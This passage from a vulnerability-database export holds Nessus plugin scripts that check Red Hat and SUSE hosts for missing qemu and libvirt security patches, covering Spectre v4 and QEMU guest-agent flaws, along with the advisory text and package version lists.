exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6\\.4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.4\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:3401\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"qemu-guest-agent-0.12.1.2-2.355.el6_4.12\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"qemu-guest-agent-win32-0.12.1.2-2.355.el6_4.12\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"qemu-img-0.12.1.2-2.355.el6_4.12\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"qemu-kvm-0.12.1.2-2.355.el6_4.12\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"qemu-kvm-debuginfo-0.12.1.2-2.355.el6_4.12\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"qemu-kvm-tools-0.12.1.2-2.355.el6_4.12\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qemu-guest-agent / qemu-guest-agent-win32 / qemu-img / qemu-kvm / etc\");\n }\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-03T12:23:57", "bulletinFamily": "scanner", "description": "This update for qemu fixes the following issues :\n\nThese security issues were fixed :\n\nCVE-2018-12617: qmp_guest_file_read had an integer overflow that could\nhave been exploited by sending a crafted QMP command (including\nguest-file-read with a large count value) to the agent via the\nlistening socket causing DoS (bsc#1098735).\n\nCVE-2018-11806: Prevent heap-based buffer overflow via incoming\nfragmented datagrams (bsc#1096223).\n\nWith this release the mitigations for Spectre v4 are moved the the\npatches from upstream (CVE-2018-3639, bsc#1092885).\n\nThis feature was added: Add support for block resize support for disks\nthrough the monitor (bsc#1094725).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2018-3555-1.NASL", "href": "https://www.tenable.com/plugins/nessus/118502", "published": "2018-10-30T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : qemu (SUSE-SU-2018:3555-1) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:3555-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118502);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/09/10 13:51:49\");\n\n script_cve_id(\"CVE-2018-11806\", \"CVE-2018-12617\", \"CVE-2018-3639\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : qemu (SUSE-SU-2018:3555-1) (Spectre)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for qemu fixes the following issues :\n\nThese security issues were fixed :\n\nCVE-2018-12617: qmp_guest_file_read had an integer overflow that could\nhave been exploited by sending a crafted QMP command (including\nguest-file-read with a large count value) to the agent via the\nlistening socket causing DoS (bsc#1098735).\n\nCVE-2018-11806: Prevent heap-based buffer overflow via incoming\nfragmented datagrams (bsc#1096223).\n\nWith this release the mitigations for Spectre v4 are moved the the\npatches from upstream (CVE-2018-3639, bsc#1092885).\n\nThis feature was added: Add support for block resize support for disks\nthrough the monitor (bsc#1094725).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1094725\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1096223\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1098735\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11806/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-12617/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-3639/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20183555-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?164cf97f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2018-2519=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2018-2519=1\n\nSUSE CaaS Platform ALL :\n\nTo install this update, use the SUSE CaaS Platform Velum dashboard. It\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\n\nSUSE CaaS Platform 3.0 :\n\nTo install this update, use the SUSE CaaS Platform Velum dashboard. It\nwill inform you if it detects new updates and let you then trigger\nupdating of the complete cluster in a controlled way.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-iscsi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-iscsi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-rbd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-rbd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-block-ssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-guest-agent\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-guest-agent-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-s390\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-s390-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-x86\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:qemu-x86-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-block-rbd-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-block-rbd-debuginfo-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-x86-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-x86-debuginfo-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"s390x\", reference:\"qemu-s390-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", cpu:\"s390x\", reference:\"qemu-s390-debuginfo-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-block-curl-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-block-curl-debuginfo-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-block-iscsi-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-block-iscsi-debuginfo-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-block-ssh-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-block-ssh-debuginfo-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-debugsource-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-guest-agent-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-guest-agent-debuginfo-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-lang-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-tools-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-tools-debuginfo-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"qemu-kvm-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-block-curl-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-block-curl-debuginfo-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-debugsource-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-kvm-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-tools-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-tools-debuginfo-2.9.1-6.19.11\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"qemu-x86-2.9.1-6.19.11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qemu\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:21:52", "bulletinFamily": "scanner", "description": "This update for libvirt fixes the following issues :\n\nCVE-2018-3639: cpu: add support for ", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2018-1614-2.NASL", "href": "https://www.tenable.com/plugins/nessus/118261", "published": "2018-10-22T00:00:00", "title": "SUSE SLES12 Security Update : libvirt (SUSE-SU-2018:1614-2) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:1614-2.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118261);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/09/10 13:51:48\");\n\n script_cve_id(\"CVE-2018-3639\");\n\n script_name(english:\"SUSE SLES12 Security Update : libvirt (SUSE-SU-2018:1614-2) (Spectre)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libvirt fixes the following issues :\n\nCVE-2018-3639: cpu: add support for 'ssbd' and 'virt-ssbd' CPUID\nfeature bits pass through (bsc#1092885)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092885\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-3639/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20181614-2/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1cd73c90\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2018-1100=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-config-network\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-config-nwfilter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-interface\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-interface-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-libxl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-libxl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-lxc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-lxc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-network\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-network-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-nodedev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-nodedev-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-nwfilter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-nwfilter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-qemu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-qemu-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-secret\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-secret-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-storage\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-driver-storage-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-hooks\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-lxc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-qemu\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-daemon-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-lock-sanlock\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-lock-sanlock-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libvirt-nss-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-client-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-client-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-config-network-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-config-nwfilter-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-interface-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-interface-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-libxl-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-libxl-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-lxc-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-lxc-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-network-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-network-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-nodedev-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-nodedev-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-nwfilter-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-nwfilter-debuginfo-2.0.0-27.42.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"libvirt-daemon-driver-qemu-2.0.0-27.42.1\")) flag++;\nif 